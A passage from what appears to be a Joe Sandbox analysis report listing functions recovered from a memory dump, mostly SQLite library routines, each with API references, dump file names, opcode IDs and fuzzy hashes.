                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_stricmpsqlite3_value_text
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3779612131-0
                                                                                                                                            • Opcode ID: 345b9594c48f3b2062e608bdba17bc1ec5201df28491405d11c37324e7822611
                                                                                                                                            • Instruction ID: 1778711722accc0a567ef13fc2ecf1381ba646ee2df9bb97417e433cf556b37e
                                                                                                                                            • Opcode Fuzzy Hash: 345b9594c48f3b2062e608bdba17bc1ec5201df28491405d11c37324e7822611
                                                                                                                                            • Instruction Fuzzy Hash: 5E1160B1A447499BCB10EF6DC8952897BA1FF85374F64C62EE9A88B380D734D511CB81
                                                                                                                                            Function 61E13791 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E137A3
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E137F1
                                                                                                                                              • Part of subcall function 61E1020F: sqlite3_mutex_enter.SQLITE3 ref: 61E1024E
                                                                                                                                              • Part of subcall function 61E1020F: sqlite3_mutex_leave.SQLITE3 ref: 61E102F6
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E13815
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E13836
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1477753154-0
                                                                                                                                            • Opcode ID: 490bdfbb28945bb226f68fe68e7e78a210bbc9d669b814fdd8b1814b9d3a8a95
                                                                                                                                            • Instruction ID: b7bf7c75c260614dc911fbad7e732e75ca7371c71ec2725215b69515859c9dde
                                                                                                                                            • Opcode Fuzzy Hash: 490bdfbb28945bb226f68fe68e7e78a210bbc9d669b814fdd8b1814b9d3a8a95
                                                                                                                                            • Instruction Fuzzy Hash: 28112AB4A58B419BDB00EFA8C4C261DB7E4BBC7318F24892ED4448B369D775D890CB52
                                                                                                                                            Function 61E84C50 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __dllonexit_lock_onexit_unlock
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 209411981-0
                                                                                                                                            • Opcode ID: f96951a75b0e779a987d88cceeb6e687f3565ce9eedca95f104ac530ca983c89
                                                                                                                                            • Instruction ID: 088ec2c3c64eca5c40a35054d07e50b61bd682bda9d23a1c34d71d07e9d54e11
                                                                                                                                            • Opcode Fuzzy Hash: f96951a75b0e779a987d88cceeb6e687f3565ce9eedca95f104ac530ca983c89
                                                                                                                                            • Instruction Fuzzy Hash: DA1183B59197818FCB40EF78D48461EBBE4BF89214F618D2EE8C887351EB35D4848B82
                                                                                                                                            Function 61E0C831 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E0C869
                                                                                                                                              • Part of subcall function 61E0A1EF: sqlite3_free.SQLITE3 ref: 61E0A210
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E0C87C
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E0C85E
                                                                                                                                              • Part of subcall function 61E09B3D: sqlite3_mutex_enter.SQLITE3 ref: 61E09B5C
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E0C8AA
                                                                                                                                              • Part of subcall function 61E0A386: sqlite3_free.SQLITE3 ref: 61E0A397
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_free$sqlite3_mutex_enter
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3930042888-0
                                                                                                                                            • Opcode ID: dfeacaba43d4262452b347a059baa502f1e05a93151bc4b8fe599d9c1b4b132e
                                                                                                                                            • Instruction ID: a7e47f523c00bc455bf5fe498adf9aef8411c80d61e3bbbca34b5ea8f6faf79c
                                                                                                                                            • Opcode Fuzzy Hash: dfeacaba43d4262452b347a059baa502f1e05a93151bc4b8fe599d9c1b4b132e
                                                                                                                                            • Instruction Fuzzy Hash: 6C015A71A006898BD700EF79C88085EF7F4EF8831AF61C86DD8888B350E734E962CB55
                                                                                                                                            Function 61E1E819 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_aggregate_context.SQLITE3 ref: 61E1E82E
                                                                                                                                            • sqlite3_result_error.SQLITE3 ref: 61E1E85E
                                                                                                                                            • sqlite3_result_double.SQLITE3 ref: 61E1E874
                                                                                                                                            • sqlite3_result_int64.SQLITE3 ref: 61E1E88C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_aggregate_contextsqlite3_result_doublesqlite3_result_errorsqlite3_result_int64
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3779139978-0
                                                                                                                                            • Opcode ID: c1b0339319ee2778e301192f04af180a9e16740a6619a52179f643f7957a165c
                                                                                                                                            • Instruction ID: 67ce158fd56862053d0a6924edaa4181dc46e10072cc9a5f1e810ac956e959d0
                                                                                                                                            • Opcode Fuzzy Hash: c1b0339319ee2778e301192f04af180a9e16740a6619a52179f643f7957a165c
                                                                                                                                            • Instruction Fuzzy Hash: 2601E9B080CB459ED7059F56C486719BFE4BB89218F2AC99DE8D90B6A6C774C480CB52
                                                                                                                                            Function 61E17D44 Relevance: 6.0, APIs: 4, Instructions: 38stringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_initialize.SQLITE3 ref: 61E17D52
                                                                                                                                              • Part of subcall function 61E1797F: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E179B6
                                                                                                                                              • Part of subcall function 61E1797F: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21778), ref: 61E179EA
                                                                                                                                              • Part of subcall function 61E1797F: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17D35
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E17D6A
                                                                                                                                            • strcmp.MSVCRT ref: 61E17D87
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E17D98
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializestrcmp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2933023327-0
                                                                                                                                            • Opcode ID: 92a8d35bd45ead7e4ef866d210599599e5292a63d7fac2fd8c1bb6788bd629a7
                                                                                                                                            • Instruction ID: 79458363fa57e797cd52994734bd2833a4669a63125f04a4e11b6b01a4087731
                                                                                                                                            • Opcode Fuzzy Hash: 92a8d35bd45ead7e4ef866d210599599e5292a63d7fac2fd8c1bb6788bd629a7
                                                                                                                                            • Instruction Fuzzy Hash: 66F09632A0834557D7006FB9C4C552ABBA89F86A5CF65843CDD498F309DB30D84147A2
                                                                                                                                            Function 61E17E41 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_vfs_register.SQLITE3 ref: 61E17E71
                                                                                                                                              • Part of subcall function 61E17DDE: sqlite3_initialize.SQLITE3(?,?,61E17E76), ref: 61E17DE9
                                                                                                                                              • Part of subcall function 61E17DDE: sqlite3_mutex_enter.SQLITE3(?,?,61E17E76), ref: 61E17E01
                                                                                                                                              • Part of subcall function 61E17DDE: sqlite3_mutex_leave.SQLITE3(?), ref: 61E17E33
                                                                                                                                            • sqlite3_vfs_register.SQLITE3 ref: 61E17E85
                                                                                                                                            • sqlite3_vfs_register.SQLITE3 ref: 61E17E99
                                                                                                                                            • sqlite3_vfs_register.SQLITE3 ref: 61E17EAD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_vfs_register$sqlite3_initializesqlite3_mutex_entersqlite3_mutex_leave
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2202970011-0
                                                                                                                                            • Opcode ID: 116c111f975c62758e71a20b046672a5a788bd6d92f6ce3e82883bd03000cb47
                                                                                                                                            • Instruction ID: e535d16afac83e4927456be973af1f03fa588a6ee2b19afb015943bb6a7a0ce6
                                                                                                                                            • Opcode Fuzzy Hash: 116c111f975c62758e71a20b046672a5a788bd6d92f6ce3e82883bd03000cb47
                                                                                                                                            • Instruction Fuzzy Hash: 1DF03AB19182489BD3406F64C10732FBAE5AFC6B08F71C81CD089872C4C775C4419B53
                                                                                                                                            Function 61E17775 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_log
                                                                                                                                            • String ID: @6a
                                                                                                                                            • API String ID: 632333372-3141242769
                                                                                                                                            • Opcode ID: 27c47573da3e38849dbf6bdbf2e8815780ec0866abec940012f18dbe2e480e62
                                                                                                                                            • Instruction ID: c7bfb48737037a274caa4d5e8f79f19cfc5c533abebaddf0c36844fd74782d27
                                                                                                                                            • Opcode Fuzzy Hash: 27c47573da3e38849dbf6bdbf2e8815780ec0866abec940012f18dbe2e480e62
                                                                                                                                            • Instruction Fuzzy Hash: 15513870A9A645DFDF80CF2CC14664D77A2F78B764F29C01AEC488B3A8D734D8858B61
                                                                                                                                            Function 61E265AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_win32_is_nt.SQLITE3 ref: 61E265E5
                                                                                                                                              • Part of subcall function 61E172E3: InterlockedCompareExchange.KERNEL32 ref: 61E17303
                                                                                                                                              • Part of subcall function 61E172E3: InterlockedCompareExchange.KERNEL32 ref: 61E1734A
                                                                                                                                              • Part of subcall function 61E172E3: InterlockedCompareExchange.KERNEL32 ref: 61E1736A
                                                                                                                                              • Part of subcall function 61E1726D: sqlite3_win32_sleep.SQLITE3 ref: 61E172C5
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E266B0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CompareExchangeInterlocked$sqlite3_freesqlite3_win32_is_ntsqlite3_win32_sleep
                                                                                                                                            • String ID: winDelete
                                                                                                                                            • API String ID: 3336177498-3936022152
                                                                                                                                            • Opcode ID: 38af854695d88063867f47c327f837f6ef6e7ecf0c5df9d1445217bf7ec35edf
                                                                                                                                            • Instruction ID: ee1c88bcb7bf17ca4bbb7f5b05afb30e27c1f31fcd5655c10b75829973c74d2c
                                                                                                                                            • Opcode Fuzzy Hash: 38af854695d88063867f47c327f837f6ef6e7ecf0c5df9d1445217bf7ec35edf
                                                                                                                                            • Instruction Fuzzy Hash: 3C31E8B0A086858BEF215FA4C4A029E7BB4EF8D71CF24C729EC5197390D778C4428B92
                                                                                                                                            Function 61E59A41 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 3
                                                                                                                                            • API String ID: 0-1842515611
                                                                                                                                            • Opcode ID: aff4d5094be7a14891d1516a6f6211dfce19b2a57278dc6b86adcafc08da7d25
                                                                                                                                            • Instruction ID: c626fe9c01af6656bc1901436286d48693416cfa5ee9491a07d78c824d9510c7
                                                                                                                                            • Opcode Fuzzy Hash: aff4d5094be7a14891d1516a6f6211dfce19b2a57278dc6b86adcafc08da7d25
                                                                                                                                            • Instruction Fuzzy Hash: 4631ADB0A042958BDB908F28C4C07C9BBF0BB45318F24C1A9E9988B346D376EC91CF81
                                                                                                                                            Function 61E85070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Virtual$ProtectQuery
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 1027372294-2766056989
                                                                                                                                            • Opcode ID: 767c4381f0a500dca40e41fb95efa6bf75c3e719ed81a202d7ecd4e96cbe2b03
                                                                                                                                            • Instruction ID: 4fec5ea76922f852ca7d192f865ae09c671dcead33a5dfea62c4ae1a1cc41790
                                                                                                                                            • Opcode Fuzzy Hash: 767c4381f0a500dca40e41fb95efa6bf75c3e719ed81a202d7ecd4e96cbe2b03
                                                                                                                                            • Instruction Fuzzy Hash: 65319AB6915B018FD740DF68D98061ABBF0BF84314F69C91DD89E87350EB30E844CB82
                                                                                                                                            Function 61E1E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_aggregate_context.SQLITE3 ref: 61E1E2B7
                                                                                                                                            • sqlite3_value_numeric_type.SQLITE3 ref: 61E1E2C3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3265351223-3916222277
                                                                                                                                            • Opcode ID: 284a7e7d2da9a4d4ab157598865195ae1c3f0bde0c74834f4f5f981b267ab200
                                                                                                                                            • Instruction ID: bcca8e5808c92f6b07b9230614678ab68729562935ef82a8d2553d496b43b86c
                                                                                                                                            • Opcode Fuzzy Hash: 284a7e7d2da9a4d4ab157598865195ae1c3f0bde0c74834f4f5f981b267ab200
